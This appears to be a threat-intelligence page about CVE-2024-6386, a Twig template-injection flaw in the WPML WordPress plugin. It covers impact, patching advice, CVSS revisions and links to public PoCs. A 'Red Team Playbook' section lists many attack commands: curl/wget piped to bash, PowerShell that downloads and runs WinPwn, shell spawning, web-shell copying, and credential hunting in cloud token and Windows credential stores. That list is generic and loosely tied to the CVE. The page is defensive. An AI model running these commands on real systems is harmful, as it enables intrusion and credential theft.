CVE-2024-6386
Overview
This vulnerability is a Server-Side Template Injection (SSTI) in the WPML WordPress plugin, specifically within its Twig rendering function. The root cause is the lack of input validation and sanitization on user-supplied data processed by the render function. This flaw affects all WPML versions up to and including 4.6.12, allowing crafted template code execution within the Twig template engine context.
Vulnerability Description
The WPML plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.6.12 via Twig Server-Side Template Injection. This is due to missing input validation and sanitization on the render function. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server.
Impact
An attacker with Contributor-level or higher access can execute arbitrary code on the hosting server, potentially leading to full system compromise, data theft, or service disruption. The exploit requires authenticated access but no user interaction beyond login. Given the CVSS vector (AV:N/AC:L/PR:L/UI:N), the vulnerability is remotely exploitable with low attack complexity and no user interaction, significantly increasing the threat to affected environments.
Solution
Users should upgrade WPML to versions later than 4.6.12 where the issue is patched, as detailed in the Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/f7fc91cc-e529-4362-8269-bf7ee0766e1e). The WPML vendor site (https://wpml.org/) provides updated plugin versions and installation instructions. No specific workaround is documented; immediate update is the recommended mitigation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the WPML plugin for WordPress arises from a critical flaw in its handling of server-side template rendering, specifically through the Twig templating engine. This flaw is characterized by inadequate input validation and sanitization processes within the render function, which allows for the injection of malicious code. When an attacker is able to manipulate the input to this function, they can execute arbitrary code on the server. The vulnerability affects all versions of the plugin up to and including 4.6.12, making it a significant risk for any WordPress site utilizing this plugin.
Exploitation of this vulnerability can occur through various attack vectors, primarily targeting authenticated users with Contributor-level access or higher. An attacker could craft a malicious payload that, when processed by the vulnerable render function, executes arbitrary code on the server. For example, an attacker could upload a specially crafted template file or manipulate existing templates to include malicious code. Once executed, this could lead to a complete compromise of the web server, allowing the attacker to install backdoors, exfiltrate sensitive data, or further pivot within the network.
The real-world implications of this vulnerability are profound, particularly for businesses that rely on WordPress for their online presence. Given the widespread use of the WPML plugin for multilingual capabilities, many organizations could find themselves at risk. The potential for remote code execution means that an attacker could gain full control of the affected server, leading to data breaches, defacement of websites, or even the deployment of ransomware. The financial and reputational damage from such incidents can be substantial, with businesses facing regulatory fines, loss of customer trust, and significant recovery costs.
To detect this vulnerability, organizations should implement regular security audits and vulnerability scanning tailored to their WordPress installations. Monitoring for unusual activity, such as unexpected file changes or unauthorized access attempts, can also help in identifying potential exploitation attempts. Additionally, maintaining an up-to-date inventory of plugins and their versions is crucial for ensuring that any known vulnerabilities are promptly addressed.
Mitigation strategies should focus on immediate actions, such as updating the WPML plugin to the latest version, which includes patches for this vulnerability. Furthermore, organizations should enforce the principle of least privilege, ensuring that only necessary users have access to sensitive functionalities within the WordPress admin interface. Implementing Web Application Firewalls (WAFs) can also provide an additional layer of security by filtering out malicious requests before they reach the application. Overall, a proactive approach to security, including regular updates, monitoring, and user access controls, is essential to safeguard against such vulnerabilities.
The CVSS score for CVE-2024-6386 has been revised upward from 8.8 to 9.9, reflecting a reassessment of the vulnerability’s criticality. This adjustment underscores a heightened recognition of the exploit’s potential impact and ease of exploitation, particularly given the low privilege level required for successful attacks. CSURFACE threat intelligence notes that while the EPSS score remains stable at a very high percentile, new proof-of-concept exploits have emerged on public repositories, increasing the accessibility of attack methods to a broader range of adversaries. Our telemetry indicates a steady but persistent interest in leveraging this vulnerability, which, combined with the critical severity rating, elevates the overall threat posture. This change signals that defenders must regard CVE-2024-6386 as an immediate and severe risk, as the vulnerability enables authenticated contributors to execute arbitrary code remotely, potentially leading to full server compromise. The increased CVSS score aligns with the growing exploitation potential and the availability of attack tools, thereby intensifying the urgency for detection and response measures within affected environments.
Update 2 — May 21, 2026
Recent CSURFACE threat intelligence indicates a downward revision of the CVSS score for CVE-2024-6386 from 9.9 to 8.8, reflecting a more precise understanding of the vulnerability’s exploitability and impact. This adjustment stems from refined analysis of the attack vector and required privileges—specifically, the necessity for authenticated Contributor-level access—which slightly limits the ease of exploitation compared to initial assessments. Despite this reduction, the vulnerability remains classified as high severity, supported by stable EPSS metrics that place it near the top percentile for exploitation likelihood. Our telemetry continues to detect steady interest in publicly available proof-of-concept exploits, underscoring persistent adversary focus. This nuanced recalibration matters because it refines risk prioritization for defenders, emphasizing that while the threat remains urgent, the attack surface is somewhat constrained by authentication requirements. Consequently, the threat level remains elevated but with a clearer context for resource allocation and monitoring strategies within affected WordPress environments.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Wpml | Wpml | All |
cpe:2.3:a:wpml:wpml:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
argendo/CVE-2024-6386
Research and PoC for CVE-2024-6386
|
argendo | 5 | 0 | 2024-09-05 | View |
|
bananoname/CVE-2024-6386-WPML-SSTI
|
bananoname | 0 | 0 | 2026-02-10 | View |
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-6386 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/f7fc91cc-e529-4362-8269-bf7ee0766e1e?source=cve |
| wpml.org |
GitHub CVE
|
https://wpml.org/ |
| sec.stealthcopter.com |
GitHub CVE
|
https://sec.stealthcopter.com/wpml-rce-via-twig-ssti/ |